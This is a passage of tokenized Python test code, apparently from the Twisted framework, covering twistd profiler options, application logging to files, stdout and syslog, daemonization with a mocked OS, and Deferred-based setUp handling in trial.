stdout , oldStdout ) <EOL> if profile is None : <EOL> test_profilePrintStatsError . skip = "<STR_LIT>" <EOL> def test_cProfile ( self ) : <EOL> """<STR_LIT>""" <EOL> config = twistd . ServerOptions ( ) <EOL> config [ "<STR_LIT>" ] = self . mktemp ( ) <EOL> config [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> profiler = app . AppProfiler ( config ) <EOL> reactor = DummyReactor ( ) <EOL> profiler . run ( reactor ) <EOL> self . assertTrue ( reactor . called ) <EOL> with open ( config [ "<STR_LIT>" ] ) as f : <EOL> data = f . read ( ) <EOL> self . assertIn ( "<STR_LIT>" , data ) <EOL> self . assertIn ( "<STR_LIT>" , data ) <EOL> if cProfile is None : <EOL> test_cProfile . skip = "<STR_LIT>" <EOL> def test_cProfileSaveStats ( self ) : <EOL> """<STR_LIT>""" <EOL> config = twistd . ServerOptions ( ) <EOL> config [ "<STR_LIT>" ] = self . mktemp ( ) <EOL> config [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> config [ "<STR_LIT>" ] = True <EOL> profiler = app . AppProfiler ( config ) <EOL> reactor = DummyReactor ( ) <EOL> profiler . run ( reactor ) <EOL> self . assertTrue ( reactor . called ) <EOL> self . _testStats ( pstats . Stats , config [ '<STR_LIT>' ] ) <EOL> if cProfile is None : <EOL> test_cProfileSaveStats . skip = "<STR_LIT>" <EOL> def test_withoutCProfile ( self ) : <EOL> """<STR_LIT>""" <EOL> savedModules = sys . modules . copy ( ) <EOL> sys . modules [ "<STR_LIT>" ] = None <EOL> config = twistd . ServerOptions ( ) <EOL> config [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> profiler = app . AppProfiler ( config ) <EOL> try : <EOL> self . assertRaises ( SystemExit , profiler . run , None ) <EOL> finally : <EOL> sys . modules . clear ( ) <EOL> sys . modules . update ( savedModules ) <EOL> def test_unknownProfiler ( self ) : <EOL> """<STR_LIT>""" <EOL> config = twistd . ServerOptions ( ) <EOL> config [ "<STR_LIT>" ] = self . mktemp ( ) <EOL> config [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> error = self . assertRaises ( SystemExit , app . AppProfiler , config ) <EOL> self . 
assertEqual ( str ( error ) , "<STR_LIT>" ) <EOL> def test_defaultProfiler ( self ) : <EOL> """<STR_LIT>""" <EOL> profiler = app . AppProfiler ( { } ) <EOL> self . assertEqual ( profiler . profiler , "<STR_LIT>" ) <EOL> def test_profilerNameCaseInsentive ( self ) : <EOL> """<STR_LIT>""" <EOL> profiler = app . AppProfiler ( { "<STR_LIT>" : "<STR_LIT>" } ) <EOL> self . assertEqual ( profiler . profiler , "<STR_LIT>" ) <EOL> def _patchTextFileLogObserver ( patch ) : <EOL> """<STR_LIT>""" <EOL> logFiles = [ ] <EOL> oldFileLogObserver = logger . textFileLogObserver <EOL> def observer ( logFile , * args , ** kwargs ) : <EOL> logFiles . append ( logFile ) <EOL> return oldFileLogObserver ( logFile , * args , ** kwargs ) <EOL> patch ( logger , '<STR_LIT>' , observer ) <EOL> return logFiles <EOL> def _setupSyslog ( testCase ) : <EOL> """<STR_LIT>""" <EOL> logMessages = [ ] <EOL> class fakesyslogobserver ( object ) : <EOL> def __init__ ( self , prefix ) : <EOL> logMessages . append ( prefix ) <EOL> def emit ( self , eventDict ) : <EOL> logMessages . append ( eventDict ) <EOL> testCase . patch ( syslog , "<STR_LIT>" , fakesyslogobserver ) <EOL> return logMessages <EOL> class AppLoggerTests ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> """<STR_LIT>""" <EOL> self . observers = [ ] <EOL> def beginLoggingTo ( observers ) : <EOL> for observer in observers : <EOL> self . observers . append ( observer ) <EOL> globalLogPublisher . addObserver ( observer ) <EOL> self . patch ( globalLogBeginner , '<STR_LIT>' , beginLoggingTo ) <EOL> def tearDown ( self ) : <EOL> """<STR_LIT>""" <EOL> for observer in self . observers : <EOL> globalLogPublisher . removeObserver ( observer ) <EOL> def _makeObserver ( self ) : <EOL> """<STR_LIT>""" <EOL> @ implementer ( ILogObserver ) <EOL> class TestObserver ( object ) : <EOL> _logs = [ ] <EOL> def __call__ ( self , event ) : <EOL> self . _logs . 
append ( event ) <EOL> return TestObserver ( ) <EOL> def _checkObserver ( self , observer ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( self . observers , [ observer ] ) <EOL> self . assertIn ( "<STR_LIT>" , observer . _logs [ <NUM_LIT:0> ] [ "<STR_LIT>" ] ) <EOL> self . assertIn ( "<STR_LIT>" , observer . _logs [ <NUM_LIT:1> ] [ "<STR_LIT>" ] ) <EOL> def test_start ( self ) : <EOL> """<STR_LIT>""" <EOL> logger = app . AppLogger ( { } ) <EOL> observer = self . _makeObserver ( ) <EOL> logger . _getLogObserver = lambda : observer <EOL> logger . start ( Componentized ( ) ) <EOL> self . _checkObserver ( observer ) <EOL> def test_startUsesApplicationLogObserver ( self ) : <EOL> """<STR_LIT>""" <EOL> application = Componentized ( ) <EOL> observer = self . _makeObserver ( ) <EOL> application . setComponent ( ILogObserver , observer ) <EOL> logger = app . AppLogger ( { } ) <EOL> logger . start ( application ) <EOL> self . _checkObserver ( observer ) <EOL> def _setupConfiguredLogger ( self , application , extraLogArgs = { } , <EOL> appLogger = app . AppLogger ) : <EOL> """<STR_LIT>""" <EOL> observer = self . _makeObserver ( ) <EOL> logArgs = { "<STR_LIT>" : lambda : observer } <EOL> logArgs . update ( extraLogArgs ) <EOL> logger = appLogger ( logArgs ) <EOL> logger . start ( application ) <EOL> return observer <EOL> def test_startUsesConfiguredLogObserver ( self ) : <EOL> """<STR_LIT>""" <EOL> application = Componentized ( ) <EOL> self . _checkObserver ( self . _setupConfiguredLogger ( application ) ) <EOL> def test_configuredLogObserverBeatsComponent ( self ) : <EOL> """<STR_LIT>""" <EOL> observer = self . _makeObserver ( ) <EOL> application = Componentized ( ) <EOL> application . setComponent ( ILogObserver , observer ) <EOL> self . _checkObserver ( self . _setupConfiguredLogger ( application ) ) <EOL> self . assertEqual ( observer . 
_logs , [ ] ) <EOL> def test_configuredLogObserverBeatsLegacyComponent ( self ) : <EOL> """<STR_LIT>""" <EOL> nonlogs = [ ] <EOL> application = Componentized ( ) <EOL> application . setComponent ( LegacyILogObserver , nonlogs . append ) <EOL> self . _checkObserver ( self . _setupConfiguredLogger ( application ) ) <EOL> self . assertEqual ( nonlogs , [ ] ) <EOL> def test_loggerComponentBeatsLegacyLoggerComponent ( self ) : <EOL> """<STR_LIT>""" <EOL> nonlogs = [ ] <EOL> observer = self . _makeObserver ( ) <EOL> application = Componentized ( ) <EOL> application . setComponent ( ILogObserver , observer ) <EOL> application . setComponent ( LegacyILogObserver , nonlogs . append ) <EOL> logger = app . AppLogger ( { } ) <EOL> logger . start ( application ) <EOL> self . _checkObserver ( observer ) <EOL> self . assertEqual ( nonlogs , [ ] ) <EOL> def test_configuredLogObserverBeatsSyslog ( self ) : <EOL> """<STR_LIT>""" <EOL> logs = _setupSyslog ( self ) <EOL> application = Componentized ( ) <EOL> self . _checkObserver ( self . _setupConfiguredLogger ( application , <EOL> { "<STR_LIT>" : True } , <EOL> UnixAppLogger ) ) <EOL> self . assertEqual ( logs , [ ] ) <EOL> if _twistd_unix is None or syslog is None : <EOL> test_configuredLogObserverBeatsSyslog . skip = ( <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_configuredLogObserverBeatsLogfile ( self ) : <EOL> """<STR_LIT>""" <EOL> application = Componentized ( ) <EOL> path = self . mktemp ( ) <EOL> self . _checkObserver ( self . _setupConfiguredLogger ( application , <EOL> { "<STR_LIT>" : "<STR_LIT:path>" } ) ) <EOL> self . assertFalse ( os . path . exists ( path ) ) <EOL> def test_getLogObserverStdout ( self ) : <EOL> """<STR_LIT>""" <EOL> logger = app . AppLogger ( { "<STR_LIT>" : "<STR_LIT:->" } ) <EOL> logFiles = _patchTextFileLogObserver ( self . patch ) <EOL> logger . _getLogObserver ( ) <EOL> self . assertEqual ( len ( logFiles ) , <NUM_LIT:1> ) <EOL> self . assertIdentical ( logFiles [ <NUM_LIT:0> ] , sys . 
stdout ) <EOL> logger = app . AppLogger ( { "<STR_LIT>" : "<STR_LIT>" } ) <EOL> logger . _getLogObserver ( ) <EOL> self . assertEqual ( len ( logFiles ) , <NUM_LIT:2> ) <EOL> self . assertIdentical ( logFiles [ <NUM_LIT:1> ] , sys . stdout ) <EOL> def test_getLogObserverFile ( self ) : <EOL> """<STR_LIT>""" <EOL> logFiles = _patchTextFileLogObserver ( self . patch ) <EOL> filename = self . mktemp ( ) <EOL> logger = app . AppLogger ( { "<STR_LIT>" : filename } ) <EOL> logger . _getLogObserver ( ) <EOL> self . assertEqual ( len ( logFiles ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( logFiles [ <NUM_LIT:0> ] . path , <EOL> os . path . abspath ( filename ) ) <EOL> def test_stop ( self ) : <EOL> """<STR_LIT>""" <EOL> removed = [ ] <EOL> observer = object ( ) <EOL> def remove ( observer ) : <EOL> removed . append ( observer ) <EOL> self . patch ( globalLogPublisher , '<STR_LIT>' , remove ) <EOL> logger = app . AppLogger ( { } ) <EOL> logger . _observer = observer <EOL> logger . stop ( ) <EOL> self . assertEqual ( removed , [ observer ] ) <EOL> logger . stop ( ) <EOL> self . assertEqual ( removed , [ observer ] ) <EOL> self . assertIdentical ( logger . _observer , None ) <EOL> def test_legacyObservers ( self ) : <EOL> """<STR_LIT>""" <EOL> logs = [ ] <EOL> logger = app . AppLogger ( { } ) <EOL> @ implementer ( LegacyILogObserver ) <EOL> class LoggerObserver ( object ) : <EOL> """<STR_LIT>""" <EOL> def __call__ ( self , x ) : <EOL> """<STR_LIT>""" <EOL> logs . append ( x ) <EOL> logger . _observerFactory = lambda : LoggerObserver ( ) <EOL> logger . start ( Componentized ( ) ) <EOL> self . assertIn ( "<STR_LIT>" , textFromEventDict ( logs [ <NUM_LIT:0> ] ) ) <EOL> warnings = self . flushWarnings ( <EOL> [ self . test_legacyObservers ] ) <EOL> self . assertEqual ( len ( warnings ) , <NUM_LIT:0> ) <EOL> def test_unmarkedObserversDeprecated ( self ) : <EOL> """<STR_LIT>""" <EOL> logs = [ ] <EOL> logger = app . AppLogger ( { } ) <EOL> logger . _getLogObserver = lambda : logs . 
append <EOL> logger . start ( Componentized ( ) ) <EOL> self . assertIn ( "<STR_LIT>" , textFromEventDict ( logs [ <NUM_LIT:0> ] ) ) <EOL> warnings = self . flushWarnings ( <EOL> [ self . test_unmarkedObserversDeprecated ] ) <EOL> self . assertEqual ( len ( warnings ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( warnings [ <NUM_LIT:0> ] [ "<STR_LIT:message>" ] , <EOL> ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) ) <EOL> class UnixAppLoggerTests ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> if _twistd_unix is None : <EOL> skip = "<STR_LIT>" <EOL> def setUp ( self ) : <EOL> """<STR_LIT>""" <EOL> self . signals = [ ] <EOL> def fakeSignal ( sig , f ) : <EOL> self . signals . append ( ( sig , f ) ) <EOL> self . patch ( signal , "<STR_LIT>" , fakeSignal ) <EOL> def test_getLogObserverStdout ( self ) : <EOL> """<STR_LIT>""" <EOL> logFiles = _patchTextFileLogObserver ( self . patch ) <EOL> logger = UnixAppLogger ( { "<STR_LIT>" : "<STR_LIT:->" , "<STR_LIT>" : True } ) <EOL> logger . _getLogObserver ( ) <EOL> self . assertEqual ( len ( logFiles ) , <NUM_LIT:1> ) <EOL> self . assertIdentical ( logFiles [ <NUM_LIT:0> ] , sys . stdout ) <EOL> logger = UnixAppLogger ( { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : True } ) <EOL> logger . _getLogObserver ( ) <EOL> self . assertEqual ( len ( logFiles ) , <NUM_LIT:2> ) <EOL> self . assertIdentical ( logFiles [ <NUM_LIT:1> ] , sys . stdout ) <EOL> def test_getLogObserverStdoutDaemon ( self ) : <EOL> """<STR_LIT>""" <EOL> logger = UnixAppLogger ( { "<STR_LIT>" : "<STR_LIT:->" , "<STR_LIT>" : False } ) <EOL> error = self . assertRaises ( SystemExit , logger . _getLogObserver ) <EOL> self . assertEqual ( str ( error ) , "<STR_LIT>" ) <EOL> def test_getLogObserverFile ( self ) : <EOL> """<STR_LIT>""" <EOL> logFiles = _patchTextFileLogObserver ( self . patch ) <EOL> filename = self . 
mktemp ( ) <EOL> logger = UnixAppLogger ( { "<STR_LIT>" : filename } ) <EOL> logger . _getLogObserver ( ) <EOL> self . assertEqual ( len ( logFiles ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( logFiles [ <NUM_LIT:0> ] . path , os . path . abspath ( filename ) ) <EOL> self . assertEqual ( len ( self . signals ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( self . signals [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] , signal . SIGUSR1 ) <EOL> d = Deferred ( ) <EOL> def rotate ( ) : <EOL> d . callback ( None ) <EOL> logFiles [ <NUM_LIT:0> ] . rotate = rotate <EOL> rotateLog = self . signals [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] <EOL> rotateLog ( None , None ) <EOL> return d <EOL> def test_getLogObserverDontOverrideSignalHandler ( self ) : <EOL> """<STR_LIT>""" <EOL> def fakeGetSignal ( sig ) : <EOL> self . assertEqual ( sig , signal . SIGUSR1 ) <EOL> return object ( ) <EOL> self . patch ( signal , "<STR_LIT>" , fakeGetSignal ) <EOL> filename = self . mktemp ( ) <EOL> logger = UnixAppLogger ( { "<STR_LIT>" : filename } ) <EOL> logger . _getLogObserver ( ) <EOL> self . assertEqual ( self . signals , [ ] ) <EOL> def test_getLogObserverDefaultFile ( self ) : <EOL> """<STR_LIT>""" <EOL> logFiles = _patchTextFileLogObserver ( self . patch ) <EOL> logger = UnixAppLogger ( { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : False } ) <EOL> logger . _getLogObserver ( ) <EOL> self . assertEqual ( len ( logFiles ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( logFiles [ <NUM_LIT:0> ] . path , os . path . abspath ( "<STR_LIT>" ) ) <EOL> def test_getLogObserverSyslog ( self ) : <EOL> """<STR_LIT>""" <EOL> logs = _setupSyslog ( self ) <EOL> logger = UnixAppLogger ( { "<STR_LIT>" : True , "<STR_LIT>" : "<STR_LIT>" } ) <EOL> observer = logger . _getLogObserver ( ) <EOL> self . assertEqual ( logs , [ "<STR_LIT>" ] ) <EOL> observer ( { "<STR_LIT:a>" : "<STR_LIT:b>" } ) <EOL> self . assertEqual ( logs , [ "<STR_LIT>" , { "<STR_LIT:a>" : "<STR_LIT:b>" } ] ) <EOL> if syslog is None : <EOL> test_getLogObserverSyslog . 
skip = "<STR_LIT>" <EOL> class DaemonizeTests ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> self . mockos = MockOS ( ) <EOL> self . config = twistd . ServerOptions ( ) <EOL> self . patch ( _twistd_unix , '<STR_LIT>' , self . mockos ) <EOL> self . runner = _twistd_unix . UnixApplicationRunner ( self . config ) <EOL> self . runner . application = service . Application ( "<STR_LIT>" ) <EOL> self . runner . oldstdout = sys . stdout <EOL> self . runner . oldstderr = sys . stderr <EOL> self . runner . startReactor = lambda * args : None <EOL> def test_success ( self ) : <EOL> """<STR_LIT>""" <EOL> with AlternateReactor ( FakeDaemonizingReactor ( ) ) : <EOL> self . runner . postApplication ( ) <EOL> self . assertEqual ( <EOL> self . mockos . actions , <EOL> [ ( '<STR_LIT>' , '<STR_LIT:.>' ) , ( '<STR_LIT>' , <NUM_LIT> ) , ( '<STR_LIT>' , True ) , '<STR_LIT>' , <EOL> ( '<STR_LIT>' , True ) , ( '<STR_LIT>' , - <NUM_LIT:2> , '<STR_LIT:0>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) ] ) <EOL> self . assertEqual ( self . mockos . closed , [ - <NUM_LIT:3> , - <NUM_LIT:2> ] ) <EOL> def test_successInParent ( self ) : <EOL> """<STR_LIT>""" <EOL> self . mockos . child = False <EOL> self . mockos . readData = "<STR_LIT:0>" <EOL> with AlternateReactor ( FakeDaemonizingReactor ( ) ) : <EOL> self . assertRaises ( SystemError , self . runner . postApplication ) <EOL> self . assertEqual ( <EOL> self . mockos . actions , <EOL> [ ( '<STR_LIT>' , '<STR_LIT:.>' ) , ( '<STR_LIT>' , <NUM_LIT> ) , ( '<STR_LIT>' , True ) , <EOL> ( '<STR_LIT>' , - <NUM_LIT:1> , <NUM_LIT:100> ) , ( '<STR_LIT>' , <NUM_LIT:0> ) , ( '<STR_LIT>' , '<STR_LIT>' ) ] ) <EOL> self . assertEqual ( self . mockos . closed , [ - <NUM_LIT:1> ] ) <EOL> def test_successEINTR ( self ) : <EOL> """<STR_LIT>""" <EOL> written = [ ] <EOL> def raisingWrite ( fd , data ) : <EOL> written . append ( ( fd , data ) ) <EOL> if len ( written ) == <NUM_LIT:1> : <EOL> raise IOError ( errno . EINTR ) <EOL> self . 
mockos . write = raisingWrite <EOL> with AlternateReactor ( FakeDaemonizingReactor ( ) ) : <EOL> self . runner . postApplication ( ) <EOL> self . assertEqual ( <EOL> self . mockos . actions , <EOL> [ ( '<STR_LIT>' , '<STR_LIT:.>' ) , ( '<STR_LIT>' , <NUM_LIT> ) , ( '<STR_LIT>' , True ) , '<STR_LIT>' , <EOL> ( '<STR_LIT>' , True ) , ( '<STR_LIT>' , '<STR_LIT>' ) ] ) <EOL> self . assertEqual ( self . mockos . closed , [ - <NUM_LIT:3> , - <NUM_LIT:2> ] ) <EOL> self . assertEqual ( [ ( - <NUM_LIT:2> , '<STR_LIT:0>' ) , ( - <NUM_LIT:2> , '<STR_LIT:0>' ) ] , written ) <EOL> def test_successInParentEINTR ( self ) : <EOL> """<STR_LIT>""" <EOL> read = [ ] <EOL> def raisingRead ( fd , size ) : <EOL> read . append ( ( fd , size ) ) <EOL> if len ( read ) == <NUM_LIT:1> : <EOL> raise IOError ( errno . EINTR ) <EOL> return "<STR_LIT:0>" <EOL> self . mockos . read = raisingRead <EOL> self . mockos . child = False <EOL> with AlternateReactor ( FakeDaemonizingReactor ( ) ) : <EOL> self . assertRaises ( SystemError , self . runner . postApplication ) <EOL> self . assertEqual ( <EOL> self . mockos . actions , <EOL> [ ( '<STR_LIT>' , '<STR_LIT:.>' ) , ( '<STR_LIT>' , <NUM_LIT> ) , ( '<STR_LIT>' , True ) , <EOL> ( '<STR_LIT>' , <NUM_LIT:0> ) , ( '<STR_LIT>' , '<STR_LIT>' ) ] ) <EOL> self . assertEqual ( self . mockos . closed , [ - <NUM_LIT:1> ] ) <EOL> self . assertEqual ( [ ( - <NUM_LIT:1> , <NUM_LIT:100> ) , ( - <NUM_LIT:1> , <NUM_LIT:100> ) ] , read ) <EOL> def test_error ( self ) : <EOL> """<STR_LIT>""" <EOL> class FakeService ( service . Service ) : <EOL> def startService ( self ) : <EOL> raise RuntimeError ( "<STR_LIT>" ) <EOL> errorService = FakeService ( ) <EOL> errorService . setServiceParent ( self . runner . application ) <EOL> with AlternateReactor ( FakeDaemonizingReactor ( ) ) : <EOL> self . assertRaises ( RuntimeError , self . runner . postApplication ) <EOL> self . assertEqual ( <EOL> self . mockos . 
actions , <EOL> [ ( '<STR_LIT>' , '<STR_LIT:.>' ) , ( '<STR_LIT>' , <NUM_LIT> ) , ( '<STR_LIT>' , True ) , '<STR_LIT>' , <EOL> ( '<STR_LIT>' , True ) , ( '<STR_LIT>' , - <NUM_LIT:2> , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) ] ) <EOL> self . assertEqual ( self . mockos . closed , [ - <NUM_LIT:3> , - <NUM_LIT:2> ] ) <EOL> def test_errorInParent ( self ) : <EOL> """<STR_LIT>""" <EOL> self . mockos . child = False <EOL> self . mockos . readData = "<STR_LIT>" <EOL> errorIO = NativeStringIO ( ) <EOL> self . patch ( sys , '<STR_LIT>' , errorIO ) <EOL> with AlternateReactor ( FakeDaemonizingReactor ( ) ) : <EOL> self . assertRaises ( SystemError , self . runner . postApplication ) <EOL> self . assertEqual ( <EOL> errorIO . getvalue ( ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . assertEqual ( <EOL> self . mockos . actions , <EOL> [ ( '<STR_LIT>' , '<STR_LIT:.>' ) , ( '<STR_LIT>' , <NUM_LIT> ) , ( '<STR_LIT>' , True ) , <EOL> ( '<STR_LIT>' , - <NUM_LIT:1> , <NUM_LIT:100> ) , ( '<STR_LIT>' , <NUM_LIT:1> ) , ( '<STR_LIT>' , '<STR_LIT>' ) ] ) <EOL> self . assertEqual ( self . mockos . closed , [ - <NUM_LIT:1> ] ) <EOL> def test_errorMessageTruncated ( self ) : <EOL> """<STR_LIT>""" <EOL> class FakeService ( service . Service ) : <EOL> def startService ( self ) : <EOL> raise RuntimeError ( "<STR_LIT:x>" * <NUM_LIT:200> ) <EOL> errorService = FakeService ( ) <EOL> errorService . setServiceParent ( self . runner . application ) <EOL> with AlternateReactor ( FakeDaemonizingReactor ( ) ) : <EOL> self . assertRaises ( RuntimeError , self . runner . postApplication ) <EOL> self . assertEqual ( <EOL> self . mockos . actions , <EOL> [ ( '<STR_LIT>' , '<STR_LIT:.>' ) , ( '<STR_LIT>' , <NUM_LIT> ) , ( '<STR_LIT>' , True ) , '<STR_LIT>' , <EOL> ( '<STR_LIT>' , True ) , ( '<STR_LIT>' , - <NUM_LIT:2> , '<STR_LIT>' + '<STR_LIT:x>' * <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) ] ) <EOL> self . assertEqual ( self . mockos . 
closed , [ - <NUM_LIT:3> , - <NUM_LIT:2> ] ) <EOL> def test_hooksCalled ( self ) : <EOL> """<STR_LIT>""" <EOL> reactor = FakeDaemonizingReactor ( ) <EOL> self . runner . daemonize ( reactor ) <EOL> self . assertTrue ( reactor . _beforeDaemonizeCalled ) <EOL> self . assertTrue ( reactor . _afterDaemonizeCalled ) <EOL> def test_hooksNotCalled ( self ) : <EOL> """<STR_LIT>""" <EOL> reactor = FakeNonDaemonizingReactor ( ) <EOL> self . runner . daemonize ( reactor ) <EOL> self . assertFalse ( reactor . _beforeDaemonizeCalled ) <EOL> self . assertFalse ( reactor . _afterDaemonizeCalled ) <EOL> if _twistd_unix is None : <EOL> DaemonizeTests . skip = "<STR_LIT>" </s>
<s> """<STR_LIT>""" <EOL> from __future__ import division , absolute_import <EOL> import unittest as pyunit <EOL> from twisted . internet import defer <EOL> from twisted . trial import unittest , reporter <EOL> from twisted . trial import util <EOL> from twisted . trial . test import detests <EOL> class SetUpTests ( unittest . TestCase ) : <EOL> def _loadSuite ( self , klass ) : <EOL> loader = pyunit . TestLoader ( ) <EOL> r = reporter . TestResult ( ) <EOL> s = loader . loadTestsFromTestCase ( klass ) <EOL> return r , s <EOL> def test_success ( self ) : <EOL> result , suite = self . _loadSuite ( detests . DeferredSetUpOK ) <EOL> suite ( result ) <EOL> self . assertTrue ( result . wasSuccessful ( ) ) <EOL> self . assertEqual ( result . testsRun , <NUM_LIT:1> ) <EOL> def test_fail ( self ) : <EOL> self . assertFalse ( detests . DeferredSetUpFail . testCalled ) <EOL> result , suite = self . _loadSuite ( detests . DeferredSetUpFail ) <EOL> suite ( result ) <EOL> self . assertFalse ( result . wasSuccessful ( ) ) <EOL> self . assertEqual ( result . testsRun , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( result . failures ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( len ( result . errors ) , <NUM_LIT:1> ) <EOL> self . assertFalse ( detests . DeferredSetUpFail . testCalled ) <EOL> def test_callbackFail ( self ) : <EOL> self . assertFalse ( detests . DeferredSetUpCallbackFail . testCalled ) <EOL> result , suite = self . _loadSuite ( detests . DeferredSetUpCallbackFail ) <EOL> suite ( result ) <EOL> self . assertFalse ( result . wasSuccessful ( ) ) <EOL> self . assertEqual ( result . testsRun , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( result . failures ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( len ( result . errors ) , <NUM_LIT:1> ) <EOL> self . assertFalse ( detests . DeferredSetUpCallbackFail . testCalled ) <EOL> def test_error ( self ) : <EOL> self . assertFalse ( detests . DeferredSetUpError . testCalled ) <EOL> result , suite = self . _loadSuite ( detests . 
DeferredSetUpError ) <EOL> suite ( result ) <EOL> self . assertFalse ( result . wasSuccessful ( ) ) <EOL> self . assertEqual ( result . testsRun , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( result . failures ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( len ( result . errors ) , <NUM_LIT:1> ) <EOL> self . assertFalse ( detests . DeferredSetUpError . testCalled ) <EOL> def test_skip ( self ) : <EOL> self . assertFalse ( detests . DeferredSetUpSkip . testCalled ) <EOL> result , suite = self . _loadSuite ( detests . DeferredSetUpSkip ) <EOL> suite ( result ) <EOL> self . assertTrue ( result . wasSuccessful ( ) ) <EOL> self . assertEqual ( result . testsRun , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( result . failures ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( len ( result . errors ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( len ( result . skips ) , <NUM_LIT:1> ) <EOL> self . assertFalse ( detests . DeferredSetUpSkip . testCalled ) <EOL> class NeverFireTests ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . _oldTimeout = util . DEFAULT_TIMEOUT_DURATION <EOL> util . DEFAULT_TIMEOUT_DURATION = <NUM_LIT:0.1> <EOL> def tearDown ( self ) : <EOL> util . DEFAULT_TIMEOUT_DURATION = self . _oldTimeout <EOL> def _loadSuite ( self , klass ) : <EOL> loader = pyunit . TestLoader ( ) <EOL> r = reporter . TestResult ( ) <EOL> s = loader . loadTestsFromTestCase ( klass ) <EOL> return r , s <EOL> def test_setUp ( self ) : <EOL> self . assertFalse ( detests . DeferredSetUpNeverFire . testCalled ) <EOL> result , suite = self . _loadSuite ( detests . DeferredSetUpNeverFire ) <EOL> suite ( result ) <EOL> self . assertFalse ( result . wasSuccessful ( ) ) <EOL> self . assertEqual ( result . testsRun , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( result . failures ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( len ( result . errors ) , <NUM_LIT:1> ) <EOL> self . assertFalse ( detests . DeferredSetUpNeverFire . testCalled ) <EOL> self . assertTrue ( result . 
errors [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] . check ( defer . TimeoutError ) ) <EOL> class TestTester ( unittest . TestCase ) : <EOL> def getTest ( self , name ) : <EOL> raise NotImplementedError ( "<STR_LIT>" ) <EOL> def runTest ( self , name ) : <EOL> result = reporter . TestResult ( ) <EOL> self . getTest ( name ) . run ( result ) <EOL> return result <EOL> class DeferredTests ( TestTester ) : <EOL> def getTest ( self , name ) : <EOL> return detests . DeferredTests ( name ) <EOL> def test_pass ( self ) : <EOL> result = self . runTest ( '<STR_LIT>' ) <EOL> self . assertTrue ( result . wasSuccessful ( ) ) <EOL> self . assertEqual ( result . testsRun , <NUM_LIT:1> ) <EOL> def test_passGenerated ( self ) : <EOL> result = self . runTest ( '<STR_LIT>' ) <EOL> self . assertTrue ( result . wasSuccessful ( ) ) <EOL> self . assertEqual ( result . testsRun , <NUM_LIT:1> ) <EOL> self . assertTrue ( detests . DeferredTests . touched ) <EOL> test_passGenerated . supress = [ util . suppress ( <EOL> message = "<STR_LIT>" ) ] <EOL> def test_passInlineCallbacks ( self ) : <EOL> """<STR_LIT>""" <EOL> result = self . runTest ( '<STR_LIT>' ) <EOL> self . assertTrue ( result . wasSuccessful ( ) ) <EOL> self . assertEqual ( result . testsRun , <NUM_LIT:1> ) <EOL> self . assertTrue ( detests . DeferredTests . touched ) <EOL> def test_fail ( self ) : <EOL> result = self . runTest ( '<STR_LIT>' ) <EOL> self . assertFalse ( result . wasSuccessful ( ) ) <EOL> self . assertEqual ( result . testsRun , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( result . failures ) , <NUM_LIT:1> ) <EOL> def test_failureInCallback ( self ) : <EOL> result = self . runTest ( '<STR_LIT>' ) <EOL> self . assertFalse ( result . wasSuccessful ( ) ) <EOL> self . assertEqual ( result . testsRun , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( result . failures ) , <NUM_LIT:1> ) <EOL> def test_errorInCallback ( self ) : <EOL> result = self . runTest ( '<STR_LIT>' ) <EOL> self . assertFalse ( result . 
wasSuccessful ( ) ) <EOL> self . assertEqual ( result . testsRun , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( result . errors ) , <NUM_LIT:1> ) <EOL> def test_skip ( self ) : <EOL> result = self . runTest ( '<STR_LIT>' ) <EOL> self . assertTrue ( result . wasSuccessful ( ) ) <EOL> self . assertEqual ( result . testsRun , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( result . skips ) , <NUM_LIT:1> ) <EOL> self . assertFalse ( detests . DeferredTests . touched ) <EOL> def test_todo ( self ) : <EOL> result = self . runTest ( '<STR_LIT>' ) <EOL> self . assertTrue ( result . wasSuccessful ( ) ) <EOL> self . assertEqual ( result . testsRun , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( result . errors ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( len ( result . failures ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( len ( result . expectedFailures ) , <NUM_LIT:1> ) <EOL> def test_thread ( self ) : <EOL> result = self . runTest ( '<STR_LIT>' 